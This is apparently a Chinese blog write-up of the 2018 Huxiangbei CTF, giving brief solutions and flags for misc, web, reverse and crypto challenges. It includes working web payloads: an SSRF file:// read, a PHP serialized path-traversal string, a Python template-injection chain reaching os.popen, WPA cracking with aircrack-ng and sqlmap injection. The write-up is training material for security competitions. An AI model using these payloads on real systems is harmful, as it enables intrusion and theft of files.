2018湖湘杯writeup

 

  1. 题目名MISC Disk

解题思路、相关代码和Flag截图:

010Editor下查看,flag is not here分析a.d.s后二进制,提取出来,发现

01100110

01101100

01100001

01100111

01

 

11101100

11010001

00010001

01001101

01

 

11110011

00010110

11100101

11110100

01

 

00001100

01011100

11011010

11011111

01

第一块出来flag字样,后面拼接放入convert,解出后面字段。

得出flag{4DS_1n_D1sk}

 

  1. 题目名MISC FLOW

解题思路、相关代码和Flag截图:

解题思路原理:

1.aircrack-ng ctf.pcap -w mima.txt跑出密码password1

2.airdecap-ng ctf.pcap -e ctf -p password1   ESSID为CTF,输出ctf-dec.pcap

搜索flag得到答案

  1. 题目名Read flag

解题思路、相关代码和Flag截图:

访问显示;ssrf me with parameter 'url',因此需要构造url=?,通过分析ssrf漏洞发现该服务器对协议没有限制,使用bp爆破,发现可以用file协议。

       构造payload:http://47.107.237.27/?url=file:///var/www/html/ssrf/flag

  1. 题目名MyNote

解题思路、相关代码和Flag截图:

注册登录账号,上传图片,抓包,发现Picture=经过base64解码为反序列化字符串,修改其中的上传图片11.jpg,可以读取到flag

改a:1:{i:0;s:6:"11.jpg";}为a:1:{i:0;s:36:"../../../../../var/www/html/flag.php";},读取flag,转base64提交

 

得到Base64内容,解密得出来flag

  1. 题目名web XmeO

解题思路、相关代码和Flag截图:

尝试登录admin 密码admin登录成功,add添加如下payload,点击show出flag

{{ "".__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.get('linecache').os.popen('ls /home/XmeO/test.db').read() }}

 

 

  1. 题目名Hidden Write

解题思路、相关代码和Flag截图:

首先使用010editor分离出三张图片,使用zsteg,解出部分flag,https://github.com/zed-0xff/zsteg

在使用BlindWaterMark-master提取盲水印图片,

https://github.com/chishaxie/BlindWaterMark

拼接出flag:hxb2018{b03bca1dbca1662e632ffa5bbefe4a50}

  1. 题目名Replace

解题思路、相关代码和Flag截图:

发现题目有壳:

使用kali下的upx脱壳工具脱壳

 

使用IDA打开程序发现关键代码check函数,check函数返回值为1,即可得。

在IDA中找到关键的d1和d2,值为下图。

脚本运行结果如下:

flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}

 

  1. 题目名:Common Crypto

解题思路、相关代码和Flag截图:

题目需要输入一个flag,然后一个字符串比较验证,动态调试跟进第一个sub_140001000函数,发现里面进行这一些赋值的操作,而且调用了一个数组,发现是一个aes盒,确定是AES加密

发现字符和49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad677
86e21d5ad比较,可以确定,此段就是我们要找的key,直接解密待比较的字符串的前32个字节即可

得到flag:hxb2018{3d39929451ee66ab1658c073}放到程序里面验证正确:

  1. 题目名 code check

首页公告链接:

http://39.108.176.234:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09怀疑存在注入,id有加密

http://39.108.176.234:49882/news/目录下存在:list.zip,里面有id的加密

 

加密方法为先AES,再两次base64

编写tamper

 

sqlmap注入得到flag:hxb2018{14ef3bd9a833a50b7ae24bbb0e4d57c8}

 

 

 

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值